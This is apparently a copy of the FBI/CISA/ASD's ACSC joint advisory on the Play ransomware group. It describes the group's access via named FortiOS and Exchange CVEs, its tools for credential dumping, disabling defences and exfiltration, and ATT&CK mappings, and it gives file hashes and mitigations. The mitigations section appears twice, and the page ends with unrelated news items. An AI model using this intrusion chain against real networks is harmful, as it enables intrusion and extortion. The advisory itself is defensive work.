Refrain from requiring password changes more frequently than once per year.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. Also see Protect Yourself: Multi-Factor Authentication | Cyber.gov.au.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Organizations are advised to deploy the latest Microsoft Exchange security updates. If unable to patch, then disable Outlook Web Access (OWA) until updates are able to be undertaken. Also see Patching Applications and Operating Systems | Cyber.gov.au.
Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Also see Implementing Network Segmentation and Segregation.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 1.E]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents actors from directly connecting to remote access services they have established for persistence. Also see Inbound Traffic Filtering – Technique D3-ITF.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
Disable unused ports [CPG 2.V].
Consider adding an email banner to emails [CPG 2.M] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privileged escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E].
Maintain offline backups of data and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, an organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Tables 3-11).
Align your security technologies against this technique.
Test your technologies against this technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, the FBI’s Internet Crime Complaint Center (IC3), or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Symantec: Play Ransomware Group Using New Custom Data-Gathering Tools
[2] TrendMicro: Play Ransomware Spotlight
[3] SentinelLabs: Ransomware Developers Turn to Intermittent Encryption to Evade Detection
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.
Download a PDF version of this report:
AA23-352A #StopRansomware: Play Ransomware
(PDF, 536.19 KB
)
For a downloadable copy of IOCs, see:
AA23-352A STIX XML
(XML, 34.87 KB
)
AA23-352A STIX JSON
(JSON, 30.22 KB
)
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Initial Access
The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [T1133] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
Discovery and Defense Evasion
Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [T1562.001] and remove log files [T1070.001]. In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2]
Lateral Movement and Execution
Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [T1552] and use the Mimikatz credential dumper to gain domain administrator access [T1003]. According to open source reporting [2], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [T1059] to search for additional privilege escalation paths. Actors then distribute executables [T1570] via Group Policy Objects [T1484.001].
Exfiltration and Encryption
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [T1560.001] into .RAR format for exfiltration. The actors then use WinSCP to transfer data [T1048] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [T1486] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes. [3] (Note: System files are skipped during the encryption process.) A .play extension is added to file names and a ransom note titled ReadMe[.]txt is placed in file directory C:.
Impact
The Play ransomware group uses a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in @gmx[.]de. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network ([.]onion URL).
Leveraged Tools
Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
Table 1: Tools Leveraged by Play Ransomware Actors
Name
Description
AdFind
Used to query and retrieve information from Active Directory.
Bloodhound
Used to query and retrieve information from Active Directory.
GMER
A software tool intended to be used for detecting and removing rootkits.
IOBit
An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software.
PsExec
A tool designed to run programs and execute commands on remote systems.
PowerTool
A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things.
PowerShell
A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
Cobalt Strike
A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution.
Mimikatz
Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers.
WinPEAS
Used to search for additional privilege escalation paths.
WinRAR
Used to split compromised data into segments and to compress files into .RAR format for exfiltration.
WinSCP
Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.
Microsoft Nltest
Used by Play ransomware actors for network discovery.
Nekto / PriviCMD
Used by Play ransomware actors for privilege escalation.
Process Hacker
Used to enumerate running processes on a system.
Plink
Used to establish persistent SSH tunnels.
Indicators of Compromise
See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.
Table 2: Hashes Associated with Play Ransomware Actors
Hashes (SHA256)
Description
453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb
Play ransomware custom data gathering tool
47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57
Play ransomware encryptor
75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212
SystemBC malware EXE
7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986
SystemBC malware DLL
7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8
Play ransomware binary
7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca
SystemBC malware DLL
c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c
Play network scanner
e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74
Play ransomware binary
e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da
Play ransomware binary
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.
Table 3: Play ATT&CK Techniques for Enterprise for Initial Access
Technique Title
ID
Use
Valid Accounts
T1078
Play ransomware actors obtain and abuse existing account credentials to gain initial access.
Exploit Public Facing Application
T1190
Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks.
External Remote Services
T1133
Play ransomware actors have used remote access services, such as RDP/VPN connection to gain initial access.
Table 4: Play ATT&CK Techniques for Enterprise for Discovery
Technique Title
ID
Use
System Network Configuration Discovery
T1016
Play ransomware actors use tools like Grixba to identify network configurations and settings.
Software Discovery: Security Software Discovery
T1518.001
Play ransomware actors scan for anti-virus software.
Table 5: Play ATT&CK Techniques for Enterprise for Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software.
Indicator Removal: Clear Windows Event Logs
T1070.001
Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity.
Table 6: Play ATT&CK Techniques for Enterprise for Credential Access
Technique Title
ID
Use
Unsecured Credentials
T1552
Play ransomware actors attempt to identify and exploit credentials stored unsecurely on a compromised network.
OS Credential Dumping
T1003
Play ransomware actors use tools like Mimikatz to dump credentials.
Table 7: Play ATT&CK Techniques for Enterprise for Lateral Movement
Technique Title
ID
Use
Lateral Tool Transfer
T1570
Play ransomware actors distribute executables within the compromised environment.
Table 8: Play ATT&CK Techniques for Enterprise for Command and Control
Technique Title
ID
Use
Domain Policy Modification: Group Policy Modification
T1484.001
Play ransomware actors distribute executables via Group Policy Objects.
Table 9: Play ATT&CK Techniques for Enterprise for Collection
Technique Title
ID
Use
Archive Collected Data: Archive via Utility
T1560.001
Play ransomware actors use tools like WinRAR to compress files.
Table 10: Play ATT&CK Techniques for Enterprise for Exfiltration
Technique Title
ID
Use
Exfiltration Over Alternative Protocol
T1048
Play ransomware actors use file transfer tools like WinSCP to transfer data.
Table 11: Play ATT&CK Techniques for Enterprise for Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources.
Financial Theft
T1657
Play ransomware actors use a double-extortion model for financial gain.
MITIGATIONS
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 2.F, 2.R, 2.S] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies [CPG 2.C].
Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 2.B];
Store passwords in hashed format using industry-recognized password managers;
Add password user “salts” to shared login credentials;
Avoid reusing passwords;
Implement multiple failed login attempt account lockouts [CPG 2.G];
Disable password “hints”;
Refrain from requiring password changes more frequently than once per year.Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. Also see Protect Yourself: Multi-Factor Authentication | Cyber.gov.au.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Organizations are advised to deploy the latest Microsoft Exchange security updates. If unable to patch, then disable Outlook Web Access (OWA) until updates are able to be undertaken. Also see Patching Applications and Operating Systems | Cyber.gov.au.
Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Also see Implementing Network Segmentation and Segregation.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 1.E]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents actors from directly connecting to remote access services they have established for persistence. Also see Inbound Traffic Filtering – Technique D3-ITF.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
Disable unused ports [CPG 2.V].
Consider adding an email banner to emails [CPG 2.M] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privileged escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E].
Maintain offline backups of data and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, an organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K].
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and ASD’s ACSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Tables 3-11).
Align your security technologies against this technique.
Test your technologies against this technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI, CISA, and ASD’s ACSC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
REPORTING
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
The FBI, CISA, and ASD’s ACSC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, the FBI’s Internet Crime Complaint Center (IC3), or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD's ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA and the FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REFERENCES
[1] Symantec: Play Ransomware Group Using New Custom Data-Gathering Tools
[2] TrendMicro: Play Ransomware Spotlight
[3] SentinelLabs: Ransomware Developers Turn to Intermittent Encryption to Evade Detection
December 11, 2023
QNAP has published security advisories to address multiple vulnerabilities in QNAP products.
December 08, 2023
There have been reports of Rocky Mountain spotted fever (RMSF) in people traveling to the United States from Tecate, in the state of Baja California, Mexico.
December 08, 2023
Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.
December 07, 2023
There is an outbreak of mpox in 22 out of 26 provinces, including urban areas, in the DRC.